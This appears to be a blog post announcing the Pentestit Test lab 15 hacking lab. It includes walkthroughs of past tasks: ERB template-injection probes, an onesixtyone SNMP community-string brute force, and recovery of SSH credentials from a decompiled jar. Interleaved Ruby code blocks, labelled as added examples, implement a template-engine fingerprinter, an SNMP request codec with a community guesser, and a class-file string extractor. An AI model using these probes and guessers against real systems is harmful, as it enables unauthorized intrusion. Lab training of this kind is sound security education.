Free Penetration Testing Laboratory Test Lab 15 — Who Is the n0v1ch0k?

Nemesida WAF, published in Geek Culture
5 min read · Mar 3, 2021

On March 15, 2021, Pentestit launches Test lab 15, where IT specialists can test their skills in finding and exploiting vulnerabilities in the corporate network and web applications for free.

About Test lab

Test lab is a cyber training ground where participants gain experience in analyzing the security of information systems. Each laboratory has a complete infrastructure, a storyline and many hidden vulnerabilities that must be discovered, localized and exploited, which together form a full scenario for compromising the company's network. An important feature of Test lab is maximum realism. As participants, acting as attackers, progress through the lab, they gain access to individual nodes, each of which contains a token. The winner is the first to collect all tokens and take full control of the virtual corporate network. Anyone can try their hand and check their existing information security skills. Laboratories are always unique and contain current, relevant vulnerabilities.

What you need to test your skills and capabilities:

  1. Register in your personal account on the website lab.pentestit.ru, where information for connecting to the laboratory (login / password) will be available.
  2. Connect to the lab via OpenVPN.
  3. Establish a connection and gain access to the gateways behind which the test company network is located.
  4. Start developing an attack.

What is the essence of passing tasks

The main purpose of the laboratory is to acquire and consolidate the skills of finding and exploiting vulnerabilities, both manually and with specialized tools such as Nmap, Tplmap, Dirbuster, Wapiti, BurpSuite / OWASP ZAP, Metasploit Framework, Patator / Hydra, Enum4linux, an IDE, as well as tools for reverse engineering, network protocol analysis, etc.

By collecting tokens, you penetrate deeper into the test corporate network, where more and more servers become available for attack. Along the way you will get acquainted with popular technologies, which lets you look at information security from the attacker's side. Remember your main tools: logical thinking and resourcefulness.

For an illustrative example, we propose to analyze several tasks of the past laboratories. The full walkthrough of Test lab 14 tasks is available at the link.

All information is presented for informational purposes only, do not violate the law.

Wiki

There is a search bar on the site page; we enter some text and confirm that it is reflected on the page:

Assuming that a template engine renders the page, we enter a probe to identify it:

{{7*7}}

The entered text is displayed on the page unchanged, so this is not Jinja2 or Twig. To save time, let's use the Tplmap tool, which also could not identify the engine in use:

# ./tplmap.py -u 'http://127.0.0.1/?a='

With the help of WhatWeb, we found out that the site is written in Ruby on Rails:

# whatweb 127.0.0.1

Let's try the payload for ERB, the default Ruby on Rails templating engine (the <%= %> tag syntax): <%=7*7%>

The page displayed 49, so the template engine was identified correctly. Then we compose a request that retrieves the token.
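To make the probe sequence above concrete, here is an added example in Ruby. It is not code from the article or from the lab application (whose source is not shown); render_vulnerable reconstructs the behaviour the probes imply, namely that the query is interpolated into the ERB template source, so {{7*7}} comes back verbatim while <%=7*7%> evaluates to 49. render_safe shows the fix: a fixed template that receives the query as data and HTML-escapes it. fingerprint automates the probe table; the payload list and the engine-family names are assumptions of this example, not Tplmap's own detection logic.

```ruby
require "erb"
require "cgi"

# VULNERABLE: the user's query is interpolated into the template *source*, so
# any ERB tag in the query is compiled and executed on the server (SSTI).
# This reconstructs the behaviour observed in the lab; it is not the lab's code.
def render_vulnerable(query)
  template = "<p>Results for: #{query}</p>"
  ERB.new(template).result(binding)
end

# HARDENED: the template is a fixed string and the query is passed in as data,
# HTML-escaped at output time; it can never be parsed as template code.
SAFE_TEMPLATE = ERB.new("<p>Results for: <%= CGI.escapeHTML(q) %></p>")
def render_safe(query)
  SAFE_TEMPLATE.result_with_hash(q: query)
end

# Probe payloads in the order the article tried them (family names are this
# example's labels). Each evaluates to 49 only in its own template family and
# is reflected verbatim everywhere else.
PROBES = [
  ["{{7*7}}",  "Jinja2/Twig-style"],
  ["${7*7}",   "Freemarker/Velocity-style"],
  ["<%=7*7%>", "ERB-style"],
]

# renderer is any callable that takes the query and returns the page body.
# Returns the family whose probe was evaluated, or nil if every probe came back unchanged.
def fingerprint(renderer)
  PROBES.each do |payload, family|
    body = renderer.call(payload)
    return family if body.include?("49") && !body.include?(payload)
  end
  nil
end

if __FILE__ == $0
  puts render_vulnerable("<%=7*7%>")                   # ERB evaluates the tag
  puts render_safe("<%=7*7%>")                         # tag comes back escaped
  puts fingerprint(method(:render_vulnerable)).inspect # "ERB-style"
  puts fingerprint(method(:render_safe)).inspect       # nil
end
```

A page that already contains the digits 49 would give a false positive, so in practice use a less common product (for example 7*191) and confirm with a second, different expression before moving on to code-execution payloads. On the defensive side, the Rails fix is exactly render_safe: never build template source from request data.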

Router

Reconnaissance by scanning TCP ports yielded nothing, so we scan UDP and find an open SNMP port (UDP 161). Using the onesixtyone tool, we brute-force community strings from a wordlist:

# onesixtyone -c /usr/share/john/password.lst 172.16.50.50

With a valid community string in hand, we query the device with snmpwalk:

# snmpwalk -c skywalker -v1 172.16.50.50

After analyzing the command output, we notice a strange system name (sysName), which is probably the token.
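As an added example (not from the article), the following Ruby code builds the SNMPv1 GetRequest that onesixtyone and snmpwalk send, parses the reply, and runs a community-string guess against a simulated agent. The agent's accepted community (skywalker, taken from the article's snmpwalk command) and its sysName value (router01) are assumptions for the simulation; nothing is sent on the network. It makes the security point concrete: in SNMPv1/v2c the community string is the only credential, it is visible in cleartext in every packet, and a wrong guess produces silence rather than an error, so a wordlist can be sprayed at UDP 161 at almost no cost.

```ruby
# Added example: minimal SNMPv1 GET/response codec plus a community guesser.
SYS_NAME_OID    = "1.3.6.1.2.1.1.5.0"   # SNMPv2-MIB::sysName.0
AGENT_COMMUNITY = "skywalker"           # accepted by the simulated agent (assumption)

def ber_len(n)                          # short form below 128, long form above
  return [n].pack("C") if n < 0x80
  body = [n].pack("N").bytes.drop_while(&:zero?)
  [0x80 | body.size, *body].pack("C*")
end

def tlv(tag, body)
  [tag].pack("C") + ber_len(body.bytesize) + body.b
end

def ber_int(n)                          # non-negative INTEGER, sign bit kept clear
  body = [n].pack("N").bytes.drop_while(&:zero?)
  body = [0] if body.empty?
  body.unshift(0) if body[0] >= 0x80
  tlv(0x02, body.pack("C*"))
end

def ber_oid(dotted)                     # first two arcs share one byte, rest base-128
  arcs = dotted.split(".").map(&:to_i)
  body = [arcs[0] * 40 + arcs[1]]
  arcs[2..-1].each do |v|
    chunk = [v & 0x7f]
    while v >= 0x80
      v >>= 7
      chunk.unshift((v & 0x7f) | 0x80)
    end
    body.concat(chunk)
  end
  tlv(0x06, body.pack("C*"))
end

# SEQUENCE { version 0, community, GetRequest-PDU { id, status, index, varbinds } }
def snmp_get_request(community, oid, request_id = 1)
  varbind = tlv(0x30, ber_oid(oid) + tlv(0x05, ""))
  pdu = ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind)
  tlv(0x30, ber_int(0) + tlv(0x04, community) + tlv(0xa0, pdu))
end

def ber_read(data, pos)                 # one TLV at pos -> [tag, body, next_pos]
  tag, len = data.getbyte(pos), data.getbyte(pos + 1)
  pos += 2
  if len >= 0x80
    n = len & 0x7f
    len = data.byteslice(pos, n).bytes.inject(0) { |a, b| (a << 8) | b }
    pos += n
  end
  [tag, data.byteslice(pos, len), pos + len]
end

def decode_oid(body)
  b = body.bytes
  out, acc = [b[0] / 40, b[0] % 40], 0
  b[1..-1].each do |x|
    acc = (acc << 7) | (x & 0x7f)
    next if x >= 0x80                   # continuation bit set: more bytes follow
    out << acc
    acc = 0
  end
  out.join(".")
end

# Parses a GetRequest (pdu_type 0xa0) or GetResponse (0xa2) into its parts.
def parse_snmp(data)
  _, msg, _ = ber_read(data, 0)
  _, _version, pos = ber_read(msg, 0)
  _, community, pos = ber_read(msg, pos)
  pdu_type, pdu, _ = ber_read(msg, pos)
  pos = 0
  3.times { _, _, pos = ber_read(pdu, pos) }   # request-id, error-status, error-index
  _, varbinds, _ = ber_read(pdu, pos)
  values, pos = {}, 0
  while pos < varbinds.bytesize
    _, vb, pos = ber_read(varbinds, pos)
    _, oid, p = ber_read(vb, 0)
    vtag, val, _ = ber_read(vb, p)
    values[decode_oid(oid)] = vtag == 0x04 ? val : val.unpack1("H*")
  end
  { community: community, pdu_type: pdu_type, varbinds: values }
end

# Simulated agent: a wrong community gets silence, not an error (SNMP has no
# "bad password" reply), which is why onesixtyone can simply spray a wordlist.
# The sysName value is constructed for the demo.
def simulated_agent(request)
  msg = parse_snmp(request)
  return nil unless msg[:pdu_type] == 0xa0 && msg[:community] == AGENT_COMMUNITY
  varbind = tlv(0x30, ber_oid(SYS_NAME_OID) + tlv(0x04, "router01"))
  pdu = ber_int(1) + ber_int(0) + ber_int(0) + tlv(0x30, varbind)
  tlv(0x30, ber_int(0) + tlv(0x04, AGENT_COMMUNITY) + tlv(0xa2, pdu))
end

def guess_community(wordlist, agent)    # first community that gets any reply at all
  wordlist.find { |c| agent.call(snmp_get_request(c, SYS_NAME_OID)) }
end
```

To run this against a real device, send snmp_get_request(...) with UDPSocket to port 161 and pass the returned datagram to parse_snmp; the whole request, community string included, is readable on the wire, which is why the fix is SNMPv3 with authPriv, or at the very least non-default communities restricted by ACL to the management network.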

Java

Open the jar file as an archive and see that it consists of a single class, Main. Open Main.class in the IDE's decompiler:

After examining the decompiled code, we find the credentials used to connect over SSH, and the command whose output is displayed:

df -h | grep /dev/sda1

Note that the password is modified at runtime before use. Add a few lines to the class to print the server IP address, login and password with which the connection is actually made.

Editing the class:

Compile the modified class, replace the original class in the jar with it, and run the jar:

The displayed password is a token.
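Before patching and recompiling, a quicker first pass is to read the string constants straight out of the class file. The Ruby code below is an added example, not the article's or the lab's code: it walks the constant pool of a .class file and returns every CONSTANT_String literal (host, user name, command), skipping method names and descriptors that are merely Utf8 entries. The class bytes it parses are constructed for the demo. The caveat matches the article: a password that is transformed at runtime, as in this task, only appears in fragments, so you still instrument the class and run it (or attach a debugger) to recover the value actually used.

```ruby
# Added example: lift string literals out of a .class file's constant pool.
CP_FIXED = {                   # tag => payload size for fixed-size constant-pool entries
  3 => 4, 4 => 4, 5 => 8, 6 => 8, 7 => 2, 8 => 2, 9 => 4, 10 => 4, 11 => 4,
  12 => 4, 15 => 3, 16 => 2, 17 => 4, 18 => 4, 19 => 2, 20 => 2,
}

# Returns the text of every CONSTANT_String entry, in constant-pool order.
def class_string_literals(bytes)
  raise "not a class file" unless bytes.byteslice(0, 4) == "\xCA\xFE\xBA\xBE".b
  count = bytes.byteslice(8, 2).unpack1("n")          # constant_pool_count (entries + 1)
  utf8, string_refs = {}, []
  pos, idx = 10, 1
  while idx < count
    tag = bytes.getbyte(pos)
    pos += 1
    case tag
    when 1                                             # CONSTANT_Utf8: u2 length, then bytes
      len = bytes.byteslice(pos, 2).unpack1("n")
      # Java's "modified UTF-8" differs from UTF-8 only for NUL and supplementary chars
      utf8[idx] = bytes.byteslice(pos + 2, len).force_encoding("UTF-8")
      pos += 2 + len
    when 8                                             # CONSTANT_String: u2 index of a Utf8 entry
      string_refs << bytes.byteslice(pos, 2).unpack1("n")
      pos += 2
    else
      pos += CP_FIXED.fetch(tag) { raise "unknown constant-pool tag #{tag} at offset #{pos - 1}" }
    end
    idx += (tag == 5 || tag == 6) ? 2 : 1                # Long and Double occupy two slots
  end
  string_refs.map { |i| utf8.fetch(i) }
end

def cp_utf8(s); [1, s.bytesize].pack("Cn") + s.b; end   # helper for the constructed class

# Constructed stand-in for the lab's Main.class (not the real one): a Class entry,
# a Long (two slots), three String literals and a method name that is NOT a literal.
def constructed_main_class
  pool = [
    cp_utf8("Main"),                     # 1
    [7, 1].pack("Cn"),                   # 2  CONSTANT_Class -> #1
    cp_utf8("172.16.0.10"),              # 3  made-up host
    [8, 3].pack("Cn"),                   # 4  CONSTANT_String -> #3
    cp_utf8("admin"),                    # 5  made-up user
    [8, 5].pack("Cn"),                   # 6  CONSTANT_String -> #5
    [5, 0, 0].pack("CNN"),               # 7  CONSTANT_Long (slots 7 and 8)
    cp_utf8("df -h | grep /dev/sda1"),   # 9  the command from the article
    [8, 9].pack("Cn"),                   # 10 CONSTANT_String -> #9
    cp_utf8("main"),                     # 11 method name only, never a String literal
  ]
  # magic, minor 0, major 52 (Java 8), constant_pool_count 12, then access flags etc.
  "\xCA\xFE\xBA\xBE".b + [0, 52, 12].pack("nnn") + pool.join + [0x21, 2, 0].pack("nnn")
end

if __FILE__ == $0
  target = ARGV[0] ? File.binread(ARGV[0]) : constructed_main_class
  puts class_string_literals(target)
end
```

Usage against a real jar: unzip it (a jar is a zip), then run the script on Main.class. Strings that are concatenated or transformed in code will show up as their pieces, which is the signal to fall back to the patch-and-run approach the article uses.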

Test lab statistics

More than 33,000 users from all over the world have already registered on the laboratory website. A total of 664 participants completed the first task of the previous laboratory, and only 69 of them managed to compromise the virtual company's IT infrastructure completely.

About us

In addition to creating unique laboratories, we are the developers of Nemesida WAF; we also provide vulnerability assessment of corporate networks and web applications for large companies from Russia, the USA, Great Britain, the Czech Republic, Ukraine, Moldova, Azerbaijan, Kazakhstan and Canada, and we train the employees of large companies in information security. If you want to understand in more detail how it all works, we offer training in the Zero Security: A (basic) and Corporate laboratories (advanced) programs.

Conclusion

While working in the Test lab, participants study the nature of vulnerabilities, the main exploitation tools, countermeasures and the attacker's mindset. By understanding how real attack vectors are built, you will learn how to counter them effectively. See you in the new Test lab 15!
